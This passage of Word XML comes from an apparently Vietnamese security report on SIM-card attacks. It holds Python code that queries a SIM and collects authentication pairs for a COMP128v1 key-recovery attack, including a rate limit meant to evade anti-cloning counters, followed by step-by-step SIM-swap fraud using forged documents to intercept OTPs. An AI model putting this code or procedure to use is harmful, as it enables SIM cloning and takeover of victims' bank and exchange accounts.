      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sw2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x00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sres </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">bytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(data[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">])</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        kc   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">bytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(data[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">])</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sres, kc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KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> read_imsi(connection):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""Đọc IMSI từ EF_IMSI (DF_GSM, EF 6F07)"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># SELECT DF_GSM</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    connection.transmit([</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xA0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xA4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x7F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">])</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># SELECT EF_IMSI</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    connection.transmit([</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xA0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xA4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x6F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x07</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">])</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># READ BINARY</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    data, sw1, sw2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> connection.transmit([</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xA0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xB0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x09</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">])</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sw1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x90</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># BCD decode IMSI</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        imsi_raw </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">bytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(data[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:])  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># bỏ length byte</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        imsi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imsi_raw:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            imsi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(b </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x0F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normal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&gt;&gt;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BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                imsi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(b </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;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imsi</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collect_auth_pairs(connection, n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">150000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""Thu thập cặp (RAND, SRES) để tấn công COMP128v1"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    pairs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> []</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    conn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> get_reader()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    conn.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">connect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Bắt đầu thu thập </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cặp authentication..."</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rand </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">bytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">([random.randint(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">255</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sres, kc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> gsm_authenticate(conn, rand)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sres:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            pairs.append((rand, sres))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Tiến độ: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i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">n</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CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Rate limiting để tránh trigger SIM anti-cloning counter</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time.sleep(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FloatTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0.01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    conn.disconnect()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> pairs</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Sau khi có pairs → chạy COMP128 cryptanalysis để khôi phục Ki</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># (thuật toán cryptanalysis không liệt kê ở đây)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="55"/>
    <w:bookmarkStart w:id="56" w:name="Xe7ad15733a8b2643bebcf4aa6fce4758771171c"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4 SIM Swap Attack (Social Engineering Vector)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Đây là vectơ tấn công phổ biến nhất hiện nay vì không yêu cầu kỹ thuật cao:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Quy trình:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Thu thập thông tin cá nhân nạn nhân:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Họ tên, ngày sinh, CMND/CCCD</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Địa chỉ thường trú</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Số tài khoản ngân hàng liên kết (không cần)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Câu hỏi bảo mật (tên mẹ, trường tiểu học...)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Liên hệ nhà mạng:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Đến cửa hàng với giấy tờ giả</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Hoặc gọi hotline, vượt IVR authentication bằng thông tin thu thập</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Yêu cầu cấp lại SIM ("bị mất/hỏng"):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Nhân viên kích hoạt SIM mới với cùng số điện thoại</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - SIM gốc của nạn nhân bị vô hiệu hóa ngay lập tức</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Kết quả:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Attacker nhận tất cả SMS OTP của nạn nhân</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Bypass 2FA của ngân hàng, crypto exchange, v.v.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="56"/>
    <w:bookmarkStart w:id="57" w:name="esim-remote-sim-provisioning-attack"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.5 eSIM / Remote SIM Provisioning Attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
